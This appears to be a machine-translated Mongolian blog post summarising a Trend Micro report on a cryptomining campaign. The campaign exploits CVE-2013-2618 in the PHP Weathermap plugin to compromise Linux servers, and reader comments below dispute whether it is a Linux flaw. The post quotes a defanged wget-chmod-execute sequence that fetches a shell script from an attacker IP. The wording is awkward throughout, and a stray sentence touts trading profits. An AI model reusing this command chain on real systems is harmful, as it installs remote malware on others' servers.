Линуксийн 5 жилийн алдаа нь халдагчид криптовалют олборлох боломжийг олгодог

Linux-ийн сүйрэл

Энэ нь криптовалют олборлогч алсын компьютер ашиглах зөвшөөрөлгүйгээр Эдгээрийг эзэмшигч нь тренд болж байна. Би энэ талаар хэд хэдэн удаа блог дээрээ энэ төрлийн нөхцөл байдлын талаар аль хэдийн ярьж байсан.

Энэ нь криптовалют эхэлсэн тэр үеэс хяналтаас бүрэн гарсан юм нэлээд их газар, үнэ цэнийг эзэлсэн, аюулгүй байдлаа зөрчсөн компьютерт нэвтрэх хангалттай мэдлэгтэй хүмүүс чухал ач холбогдолтой мэдээлэл эсвэл банкны данс хайхад цаг хугацаа алдаж, мөнгөн тэтгэмж авах боломжтой болсон.

Үүнийг хийхийн оронд эдгээр багийг удирдах, уул уурхайн сүлжээнд нэгтгэх, ботнетээр ихэвчлэн хийдэг бусад ажлуудыг хамгийн энгийнээр сонгодог.

Ийм байдлаар дугаараа өөрчлөх нь ихэвчлэн илүү их байдаг. тэд зөвхөн бий болгож буй бэлэн мөнгө дээр л анхаарлаа төвлөрүүлдэг.

Зах зээлийн чиг хандлагын талаархи ухаалаг ойлголт, крипто арилжааны талаархи зохих мэдлэгийг эзэмшсэнээр та маш их ашиг олж чадна.

Линукс үнэхээр найдвартай систем мөн үү?

Бидний олонх нь Линукс бол бараг төгс аюулгүй үйлдлийн систем гэсэн ойлголттой байдаг бөгөөд бодит байдал дээр зарим нэг алдаатай хэвээр байгаа юм.

За байназарим өдөр TrendMicro олдвор хийсэн, энэ нь илчлэгдсэн шинэ Линуксийн систем дэх алдаа нь хакеруудад криптовалют олборлох давуу талыг олгож байв Linux серверүүд болон машинуудыг ашиглах.

Таны блогоор дамжуулан мэдэгдэлд тэд дараахь тайлбарыг хийв:

Ослын хариу арга хэмжээтэй холбоотой мониторингоор дамжуулан бид JenkinsMiner хортой програм ашигладаг криптовалютын олборлолтын өмнөх кампанит ажилтай уялдуулж чадсан халдлагын оролдлогыг ажигласан.

Ялгаа: энэ кампанит ажил нь Линуксийн серверүүдийг чиглүүлж байна. Энэ нь бараг таван жилийн турш нөхөөс нь бэлэн болсон хуучирсан аюулгүй байдлын алдааг ашиглан эмзэг байдлыг дахин ашигласан сонгодог хэрэг юм.

Таны анализаар дамжуулан энэ хувилбар дээр нөлөөлөлд өртсөн сайтуудыг тодорхойлж чадсан энэ бүтэлгүйтлийн төлөө Энэ нь ихэвчлэн Япон, Тайвань, Хятад, АНУ, Энэтхэгт нөлөөлдөг.

Довтолгооны шинжилгээ

Шинжилгээ хийх замаар Trend Micro Smart Protection Network халдагчид энэ алдааг хэрхэн ашиглаж байгааг жаахан нарийвчлан үзээрэй:

Энэхүү кампанит ажлын операторууд нь системийн администраторууд сүлжээний үйл ажиллагааг дүрслэхэд ашигладаг Camapi Network Weathermap залгаас дахь хуучирсан сул тал болох CVE-2013-2618-ийг ашиглаж байв.

Аюулгүй байдлын хуучин алдааг яагаад ашиглаж байгаа талаар: Сүлжээний цаг агаарын зураглалд одоогоор олон нийтэд мэдээлэгдсэн хоёрхон эмзэг байдал байна.

Эдгээр халдагчид ашиглалтын аюулгүй байдлын алдаанаас гадна нээлттэй эх сурвалж хэрэгслийг ашигладаг байгууллагуудад тохиолддог засварын хоцрогдол давуу талыг ашиглаж магадгүй юм.

Үндсэндээ халдлага нь XSS халдлагаас хамаарна:

цаг уурын зураг-криптоминер-4

Тодорхой бус хэсэг нь довтолгооны зорилт, порт бүхий вэб сервер юм.

Файл / Plugins/weathermap/configs/conn.php нь байнгын XSS халдлагаас үүдэлтэй файл юм / залгаасууд / цаг агаарын зураглал / php .

Үүнээс гадна холболт.php Эхний ээлжинд бид ижил төстэй HTTP хүсэлтийг хуудсан дээр хэрэглэснийг харж байна. cools.php '.

Криптовалютын уул уурхайн хөтөлбөрийг эмзэг байдлаар дамжуулан тарааж өгдөг PHP цаг агаарын зураглалаас Linux серверүүд болох зорилтот хуудсуудаас

Зураг дээр та халдлагыг хэрхэн яаж үүсгэж байгааг харж болно.

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

Юу хийдэг вэ гэвэл бараг бүх Linux дистрибьютерийн суулгасан хэрэгсэл болох wget файлыг татаж авах заалтыг илгээх болно.

chmod 775 watchd0g.sh

файлыг ажиллуулах боломжтой болгодог

./watchd0g.sh

Эцэст нь юу хийдэг вэ гэвэл файлыг сервер дээр ажиллуулах явдал юм.

Аз болоход, аль хэдийн нөхөөс байна ( CVE-2013-2618 ) бүтэлгүйтэх боломжтой ба Та үүнийг татаж авах боломжтой from энэ холбоос

Si та энэ талаар илүү ихийг мэдэхийг хүсч байна Энэ бүтэлгүйтлийн талаар та энэ холбоосоор орж үзэх боломжтой.

Эх сурвалж: PHP Weathermap-ийн эмзэг байдал, Линуксийн серверүүдийг чиглүүлж тараасан криптовалютын олборлогч


Нийтлэлийн агуулга нь бидний зарчмуудыг баримталдаг редакцийн ёс зүй. Алдааны талаар мэдээлэхийн тулд товшино уу энд байна.

5 сэтгэгдэл, үлдээгээрэй

Сэтгэгдэлээ үлдээгээрэй

Таны и-мэйл хаяг хэвлэгдсэн байх болно. Шаардлагатай талбарууд нь тэмдэглэгдсэн байна *

*

*

  1. Мэдээллийг хариуцах: Мигель Анхель Гатан
  2. Мэдээллийн зорилго: СПАМ-ыг хянах, сэтгэгдлийн менежмент.
  3. Хууль ёсны байдал: Таны зөвшөөрөл
  4. Мэдээллийн харилцаа холбоо: Хуулийн үүргээс бусад тохиолдолд мэдээллийг гуравдагч этгээдэд дамжуулахгүй.
  5. Өгөгдөл хадгалах: Occentus Networks (ЕХ) -с зохион байгуулсан мэдээллийн сан
  6. Эрх: Та хүссэн үедээ мэдээллээ хязгаарлаж, сэргээж, устгаж болно.

  1.   Miguel Mayol i Tur гэж хэлэв

    Тэнэг байх нь аюулгүй биш бөгөөд хэдийгээр Линукс таныг авардаг.
    Аюулгүй байдлын засваруудыг шинэчлэхгүй байгаа нь Линуксийн буруу биш юм. Зарим компаниуд мөнгө хэмнэхийн тулд тэнэг хүмүүсийг системийн администратороор ажиллуулдаг,
    Гэсэн хэдий ч үүнийг нэн даруй илрүүлж, аюулгүй байдлын хамгийн бага тохиолдлыг нэн даруй, хэвлэн нийтлэх хүртэл шийддэг.

  2.   Би элдэколетас шиг вилла хүсч байна гэж хэлэв

    Линуксд шинэчлэл хийгдээгүйд ямар алдаа байна вэ? GNU / Linux хөгжүүлэгчид шинээр гарч ирж буй эмзэг байдлын шийдлийг боловсруулж, хэрэглэгчдэд нээлттэй болгох замаар ажлаа хийдэг. Хэрэв эмч танд томуугийн эсрэг вакцин бичээд танд өгөхгүй бол та өвдөж, хөшиж өвддөг ... эмчийн буруу юу?

  3.   Guillermo гэж хэлэв

    Линукс нь тийм биш байсан тул хоёр томоохон алдаатай дараалсан хоёр мэдээ:
    1.- Хөгжүүлэлт сайтай редакторуудад үнэгүй програм хангамж оруулаад бусдыг нь мартдаг (коммент дээр иш татсан).
    2.- Вирус зөвхөн ШИНЭЧЛЭГДЭГГҮЙ серверүүдэд нөлөөлөх үеийн гайхалтай мэдээ. Гэхдээ ямар ч линукс олон арван жилийн турш анхдагчаар шинэчлэгдэж байсан бол. Windows маягийн сорох антивирус хэрэгтэй юм шиг айдас төрүүлэх. Тэд Линукс нь Windows-той адилхан, тийм биш гэж хэлэхийг оролдож байх шиг байна.
    Хэрэв алдаа нь хуучирсан бөгөөд аль хэдийн нөхөгдсөн байвал энэ нь мэдээ биш, юу ч биш юм. Майкрософт болон Trend Micro, Norton, Panda, McAffee зэрэг вирусны эсрэг үйлчилгээ үзүүлдэг компаниуд битгий тоглоорой, цалингаа аваарай.
    Дашрамд хэлэхэд, бид Trend Micro компанид хэдэн жил ажиллаж байсан бөгөөд энэ нь жинхэнэ төмс, новш байсан, учир нь түүний систем нь гүйцэтгэгддэг програмд ​​вирусын "ул мөр" агуулдаг байсан (вирус биш ч гэсэн вирус байж болно) энэ нь үүнийг устгасан (үүнийг ажиллуулахгүй байхаар нь лавлах сан руу аваачсан) ашиглахыг зөвшөөрөөгүй бөгөөд бидний ашиглах ёстой аюулгүй гүйцэтгэгдэж болох файлын тусламжтайгаар энэ үйлдлийг хориглох жагсаалт байхгүй байна. Бүү новш. Энэ бол корпорацийн хувилбар байсан бөгөөд хувь хувилбар нь ийм цагаан жагсаалтад орох боломжтой байв. Өрөвдмөөр.

  4.   Guillermo гэж хэлэв

    Өөрийгөө ийм дэгжин дүрсэлж болохгүй.
    Энэ нийтлэл нь програмыг нэвтрүүлж, түүнийг ажиллуулж, ажиллуулах боломжийг олгодог аюулгүй байдлын цоорлын тухай өгүүлдэг бөгөөд энэ нь вирус бүр тархах шаардлагатай аюулгүй байдлын цоорхой юм. үйлдлийг давтаж, өөрөө хуулахын тулд сүлжээнд байгаа компьютеруудыг сканнердах. Линукс дээр олж илрүүлсэн аюулгүй байдлын нүхнүүд нь хамгаалалтын нөхөөсөөр бүрхэгдсэн байдаг тул тэд үүнийг яг хийдэггүй бөгөөд энэ нь миний антивирус заавал биш харин нүхийг далдлахын тулд Windows ба Linux-ийн ялгаа гэж хэлж байгаа юм. Windows-д энэ нь хэд хэдэн шалтгаанаар илүү хэцүү байдаг: 1.- Файлууд нь өргөтгөсөн тул гүйцэтгэгдэх боломжтой болж, нөлөөлөлд өртсөн компьютерт нэвтрүүлэх алхамыг арилгах болно. 2.- Хэрэглэгчид нь эргэлзээтэй гарал үүсэлтэй програмуудыг байнга суулгаж байдаг, учир нь тэд өмчийн шинжтэй тул төлбөргүйгээр заавал хийлгэх шаардлагатай байдаг (MS Office, Photoshop, ... компьютерийн тоног төхөөрөмжийн зардлыг хоёр дахин нэмэгдүүлснээр гэрийн эдийн засагт юу хэрэгтэй байгааг би хэлэхгүй байна). 3.- Удалгүй эсвэл дараа нь Windows гацах болно, хэрэглэгч хөрш, найз, ... руугаа цаг алдахгүйн тулд бүх зүйлийг форматлаж, шинэчлэлт хийгдээгүй, эсвэл нөхөөс өөрөө байрлуулсан төгсгөлийн цонхыг суулгаж өгдөг. тагнуулын хөтөлбөр. Энэ нь тийм биш байж болох юм, гэхдээ энэ нь гайхалтай байж болох юм, гэхдээ энэ нь нууц үгүүдийг тагнах Windows-тэй байж болох юм. Энэ нийтлэлд тэд эмзэг байдалд өртсөн линукс дахь танилцуулах системийг дурдсан бөгөөд сүлжээг автоматаар сканнердаж, өөрөө хуулж, сервер дээр ажиллуулах програмыг ашиглах нь хамгийн хялбар хэсэг юм. Энэ нийтлэл нь аливаа вирусын хамгийн чухал алхам юм: системийн халдлагад өртөх эмзэг байдлыг мэдэх.

  5.   хамбаглио гэж хэлэв

    Муу мэдээлэл. Энэ бол Линуксийн алдаа биш, PHP APPLICATION-ийн алдаа, өөрөөр хэлбэл, олон платформ юм. Энэ нь линукс цөмийг ажиллуулдаг системүүдийн хувьд онцгой зүйл биш юм! Гэхдээ програм нь хөндлөн платформ биш байсан ч гэсэн энэ нь Линуксийн алдаа биш, зүгээр л програм байх болно.

    Линуксийн цөм нь иймэрхүү сайт хоорондын скрипт халдлагаас хамгаалахад өчүүхэн төдий ч хөндлөнгөөс оролцдоггүй. Аливаа зүйлийн талаар бага зэрэг мэддэг хүнд та муухай харагдах болно гэсэн үнэнийг нийтлэхээсээ өмнө ядаж ТАВАН МИНУТ-ыг судлаарай.